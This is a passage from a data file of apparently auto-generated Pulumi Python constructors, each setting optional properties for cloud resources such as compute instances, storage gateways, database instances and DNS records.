block_device_mappings is not None:\n pulumi.set(__self__, \"block_device_mappings\", block_device_mappings)\n if cpu_options is not None:\n pulumi.set(__self__, \"cpu_options\", cpu_options)\n if credit_specification is not None:\n pulumi.set(__self__, \"credit_specification\", credit_specification)\n if disable_api_termination is not None:\n pulumi.set(__self__, \"disable_api_termination\", disable_api_termination)\n if ebs_optimized is not None:\n pulumi.set(__self__, \"ebs_optimized\", ebs_optimized)\n if elastic_gpu_specifications is not None:\n pulumi.set(__self__, \"elastic_gpu_specifications\", elastic_gpu_specifications)\n if elastic_inference_accelerators is not None:\n pulumi.set(__self__, \"elastic_inference_accelerators\", elastic_inference_accelerators)\n if enclave_options is not None:\n pulumi.set(__self__, \"enclave_options\", enclave_options)\n if hibernation_options is not None:\n pulumi.set(__self__, \"hibernation_options\", hibernation_options)\n if host_id is not None:\n pulumi.set(__self__, \"host_id\", host_id)\n if host_resource_group_arn is not None:\n pulumi.set(__self__, \"host_resource_group_arn\", host_resource_group_arn)\n if iam_instance_profile is not None:\n pulumi.set(__self__, \"iam_instance_profile\", iam_instance_profile)\n if image_id is not None:\n pulumi.set(__self__, \"image_id\", image_id)\n if instance_initiated_shutdown_behavior is not None:\n pulumi.set(__self__, \"instance_initiated_shutdown_behavior\", instance_initiated_shutdown_behavior)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ipv6_address_count is not None:\n pulumi.set(__self__, \"ipv6_address_count\", ipv6_address_count)\n if ipv6_addresses is not None:\n pulumi.set(__self__, \"ipv6_addresses\", ipv6_addresses)\n if kernel_id is not None:\n pulumi.set(__self__, \"kernel_id\", kernel_id)\n if key_name is not None:\n pulumi.set(__self__, \"key_name\", key_name)\n if launch_template is not None:\n pulumi.set(__self__, \"launch_template\", launch_template)\n if license_specifications is not None:\n pulumi.set(__self__, \"license_specifications\", license_specifications)\n if monitoring is not None:\n pulumi.set(__self__, \"monitoring\", monitoring)\n if network_interfaces is not None:\n pulumi.set(__self__, \"network_interfaces\", network_interfaces)\n if placement_group_name is not None:\n pulumi.set(__self__, \"placement_group_name\", placement_group_name)\n if private_dns_name_options is not None:\n pulumi.set(__self__, \"private_dns_name_options\", private_dns_name_options)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if propagate_tags_to_volume_on_creation is not None:\n pulumi.set(__self__, \"propagate_tags_to_volume_on_creation\", propagate_tags_to_volume_on_creation)\n if ramdisk_id is not None:\n pulumi.set(__self__, \"ramdisk_id\", ramdisk_id)\n if security_group_ids is not None:\n pulumi.set(__self__, \"security_group_ids\", security_group_ids)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if source_dest_check is not None:\n pulumi.set(__self__, \"source_dest_check\", source_dest_check)\n if ssm_associations is not None:\n pulumi.set(__self__, \"ssm_associations\", ssm_associations)\n if subnet_id is not None:\n pulumi.set(__self__, \"subnet_id\", subnet_id)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tenancy is not None:\n pulumi.set(__self__, \"tenancy\", tenancy)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)\n if volumes is not None:\n pulumi.set(__self__, \"volumes\", volumes)", "def __init__(__self__, *,\n availability_zone: pulumi.Input[str],\n blueprint_id: pulumi.Input[str],\n bundle_id: pulumi.Input[str],\n add_on: Optional[pulumi.Input['InstanceAddOnArgs']] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n pulumi.set(__self__, \"blueprint_id\", blueprint_id)\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if add_on is not None:\n pulumi.set(__self__, \"add_on\", add_on)\n if ip_address_type is not None:\n pulumi.set(__self__, \"ip_address_type\", ip_address_type)\n if key_pair_name is not None:\n pulumi.set(__self__, \"key_pair_name\", key_pair_name)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)", "def __init__(__self__, *,\n activation_key: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None):\n if activation_key is not None:\n pulumi.set(__self__, \"activation_key\", activation_key)\n if ip_address is not None:\n pulumi.set(__self__, \"ip_address\", ip_address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_link_endpoint is not None:\n pulumi.set(__self__, \"private_link_endpoint\", private_link_endpoint)\n if security_group_arns is not None:\n pulumi.set(__self__, \"security_group_arns\", security_group_arns)\n if subnet_arns is not None:\n pulumi.set(__self__, \"subnet_arns\", subnet_arns)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vpc_endpoint_id is not None:\n pulumi.set(__self__, \"vpc_endpoint_id\", vpc_endpoint_id)", "def __init__(__self__, *,\n instance_id: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input['FileShareConfigArgs']]]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkConfigArgs']]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None):\n pulumi.set(__self__, \"instance_id\", instance_id)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if file_shares is not None:\n pulumi.set(__self__, \"file_shares\", file_shares)\n if kms_key_name is not None:\n pulumi.set(__self__, \"kms_key_name\", kms_key_name)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if networks is not None:\n pulumi.set(__self__, \"networks\", networks)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if tier is not None:\n pulumi.set(__self__, \"tier\", tier)", "def __init__(__self__, *,\n activation_key: Optional[pulumi.Input[str]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None):\n if activation_key is not None:\n pulumi.set(__self__, \"activation_key\", activation_key)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if ip_address is not None:\n pulumi.set(__self__, \"ip_address\", ip_address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_link_endpoint is not None:\n pulumi.set(__self__, \"private_link_endpoint\", private_link_endpoint)\n if security_group_arns is not None:\n pulumi.set(__self__, \"security_group_arns\", security_group_arns)\n if subnet_arns is not None:\n pulumi.set(__self__, \"subnet_arns\", subnet_arns)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if vpc_endpoint_id is not None:\n pulumi.set(__self__, \"vpc_endpoint_id\", vpc_endpoint_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n activation_key: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n add_on: Optional[pulumi.Input['InstanceAddOnArgs']] = None,\n arn: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n cpu_count: Optional[pulumi.Input[int]] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n is_static_ip: Optional[pulumi.Input[bool]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n public_ip_address: Optional[pulumi.Input[str]] = None,\n ram_size: Optional[pulumi.Input[float]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n username: Optional[pulumi.Input[str]] = None):\n if add_on is not None:\n pulumi.set(__self__, \"add_on\", add_on)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if blueprint_id is not None:\n pulumi.set(__self__, \"blueprint_id\", blueprint_id)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if cpu_count is not None:\n pulumi.set(__self__, \"cpu_count\", cpu_count)\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if ip_address_type is not None:\n pulumi.set(__self__, \"ip_address_type\", ip_address_type)\n if ipv6_address is not None:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n if ipv6_address is not None:\n pulumi.set(__self__, \"ipv6_address\", ipv6_address)\n if ipv6_addresses is not None:\n pulumi.set(__self__, \"ipv6_addresses\", ipv6_addresses)\n if is_static_ip is not None:\n pulumi.set(__self__, \"is_static_ip\", is_static_ip)\n if key_pair_name is not None:\n pulumi.set(__self__, \"key_pair_name\", key_pair_name)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if public_ip_address is not None:\n pulumi.set(__self__, \"public_ip_address\", public_ip_address)\n if ram_size is not None:\n pulumi.set(__self__, \"ram_size\", ram_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if user_data is not None:\n pulumi.set(__self__, \"user_data\", user_data)\n if username is not None:\n pulumi.set(__self__, \"username\", username)", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n kms_key: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n schedule_config: Optional[pulumi.Input['DataIntegrationScheduleConfigArgs']] = None,\n source_uri: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if kms_key is not None:\n pulumi.set(__self__, \"kms_key\", kms_key)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if schedule_config is not None:\n pulumi.set(__self__, \"schedule_config\", schedule_config)\n if source_uri is not None:\n pulumi.set(__self__, \"source_uri\", source_uri)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: InstanceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n db_instance_mode: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n engine: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceIpWhitelistArgs']]]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n entry: pulumi.Input[str],\n instance_id: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", endpoint_type)\n pulumi.set(__self__, \"entry\", entry)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if module_name is not None:\n pulumi.set(__self__, \"module_name\", module_name)", "def __init__(__self__, *,\n description: pulumi.Input[str],\n instance_series: pulumi.Input[str],\n specification: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n zone_id: pulumi.Input[str],\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"description\", description)\n pulumi.set(__self__, \"instance_series\", instance_series)\n pulumi.set(__self__, \"specification\", specification)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n pulumi.set(__self__, \"zone_id\", zone_id)\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if mysql_version is not None:\n pulumi.set(__self__, \"mysql_version\", mysql_version)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)", "def __init__(__self__, *,\n description: Optional[pulumi.Input[str]] = None,\n endpoint_type: Optional[pulumi.Input[str]] = None,\n entry: Optional[pulumi.Input[str]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None):\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if endpoint_type is not None:\n pulumi.set(__self__, \"endpoint_type\", endpoint_type)\n if entry is not None:\n pulumi.set(__self__, \"entry\", entry)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if module_name is not None:\n pulumi.set(__self__, \"module_name\", module_name)", "def __init__(__self__, *,\n name: pulumi.Input[str],\n type: pulumi.Input[str],\n value: pulumi.Input[str],\n zone_name: pulumi.Input[str],\n priority: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"type\", type)\n pulumi.set(__self__, \"value\", value)\n pulumi.set(__self__, \"zone_name\", zone_name)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)\n if ttl is not None:\n pulumi.set(__self__, \"ttl\", ttl)", "def __init__(__self__, *,\n instance_type: pulumi.Input[str],\n major_version: pulumi.Input[str],\n node_count: pulumi.Input[int],\n pay_type: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n password: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"instance_type\", instance_type)\n pulumi.set(__self__, \"major_version\", major_version)\n pulumi.set(__self__, \"node_count\", node_count)\n pulumi.set(__self__, \"pay_type\", pay_type)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if auto_renew is not None:\n pulumi.set(__self__, \"auto_renew\", auto_renew)\n if auto_renew_period is not None:\n pulumi.set(__self__, \"auto_renew_period\", auto_renew_period)\n if cluster_name is not None:\n pulumi.set(__self__, \"cluster_name\", cluster_name)\n if data_center_name is not None:\n pulumi.set(__self__, \"data_center_name\", data_center_name)\n if disk_size is not None:\n pulumi.set(__self__, \"disk_size\", disk_size)\n if disk_type is not None:\n pulumi.set(__self__, \"disk_type\", disk_type)\n if enable_public is not None:\n pulumi.set(__self__, \"enable_public\", enable_public)\n if ip_white is not None:\n pulumi.set(__self__, \"ip_white\", ip_white)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if password is not None:\n pulumi.set(__self__, \"password\", password)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if period_unit is not None:\n pulumi.set(__self__, \"period_unit\", period_unit)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__, *,\n db_instance_mode: pulumi.Input[str],\n engine: pulumi.Input[str],\n engine_version: pulumi.Input[str],\n vswitch_id: pulumi.Input[str],\n availability_zone: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"db_instance_mode\", db_instance_mode)\n pulumi.set(__self__, \"engine\", engine)\n pulumi.set(__self__, \"engine_version\", engine_version)\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if availability_zone is not None:\n warnings.warn(\"\"\"Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"availability_zone is deprecated: Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\")\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if create_sample_data is not None:\n pulumi.set(__self__, \"create_sample_data\", create_sample_data)\n if db_instance_category is not None:\n pulumi.set(__self__, \"db_instance_category\", db_instance_category)\n if db_instance_class is not None:\n pulumi.set(__self__, \"db_instance_class\", db_instance_class)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if encryption_key is not None:\n pulumi.set(__self__, \"encryption_key\", encryption_key)\n if encryption_type is not None:\n pulumi.set(__self__, \"encryption_type\", encryption_type)\n if instance_charge_type is not None:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_group_count is not None:\n pulumi.set(__self__, \"instance_group_count\", instance_group_count)\n if instance_network_type is not None:\n pulumi.set(__self__, \"instance_network_type\", instance_network_type)\n if instance_spec is not None:\n pulumi.set(__self__, \"instance_spec\", instance_spec)\n if ip_whitelists is not None:\n pulumi.set(__self__, \"ip_whitelists\", ip_whitelists)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if master_node_num is not None:\n pulumi.set(__self__, \"master_node_num\", master_node_num)\n if payment_type is not None:\n pulumi.set(__self__, \"payment_type\", payment_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if resource_group_id is not None:\n pulumi.set(__self__, \"resource_group_id\", resource_group_id)\n if security_ip_lists is not None:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n if security_ip_lists is not None:\n pulumi.set(__self__, \"security_ip_lists\", security_ip_lists)\n if seg_node_num is not None:\n pulumi.set(__self__, \"seg_node_num\", seg_node_num)\n if seg_storage_type is not None:\n pulumi.set(__self__, \"seg_storage_type\", seg_storage_type)\n if ssl_enabled is not None:\n pulumi.set(__self__, \"ssl_enabled\", ssl_enabled)\n if storage_size is not None:\n pulumi.set(__self__, \"storage_size\", storage_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if used_time is not None:\n pulumi.set(__self__, \"used_time\", used_time)\n if vector_configuration_status is not None:\n pulumi.set(__self__, \"vector_configuration_status\", vector_configuration_status)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__, *,\n active: Optional[pulumi.Input[bool]] = None,\n annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n builtin: Optional[pulumi.Input[bool]] = None,\n checksum: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n external_id: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n ui_url: Optional[pulumi.Input[str]] = None,\n url: Optional[pulumi.Input[str]] = None,\n whitelist_domains: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if active is not None:\n pulumi.set(__self__, \"active\", active)\n if annotations is not None:\n pulumi.set(__self__, \"annotations\", annotations)\n if builtin is not None:\n pulumi.set(__self__, \"builtin\", builtin)\n if checksum is not None:\n pulumi.set(__self__, \"checksum\", checksum)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if external_id is not None:\n pulumi.set(__self__, \"external_id\", external_id)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if ui_url is not None:\n pulumi.set(__self__, \"ui_url\", ui_url)\n if url is not None:\n pulumi.set(__self__, \"url\", url)\n if whitelist_domains is not None:\n pulumi.set(__self__, \"whitelist_domains\", whitelist_domains)", "def __init__(__self__, *,\n connection_string: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[str]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_series is not None:\n pulumi.set(__self__, \"instance_series\", instance_series)\n if mysql_version is not None:\n pulumi.set(__self__, \"mysql_version\", mysql_version)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if specification is not None:\n pulumi.set(__self__, \"specification\", specification)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[str]] = None,\n qualified_name: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n zone_name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)\n if qualified_name is not None:\n pulumi.set(__self__, \"qualified_name\", qualified_name)\n if ttl is not None:\n pulumi.set(__self__, \"ttl\", ttl)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if value is not None:\n pulumi.set(__self__, \"value\", value)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)\n if zone_name is not None:\n pulumi.set(__self__, \"zone_name\", zone_name)", "def __init__(__self__, *,\n active: pulumi.Input[bool],\n builtin: pulumi.Input[bool],\n url: 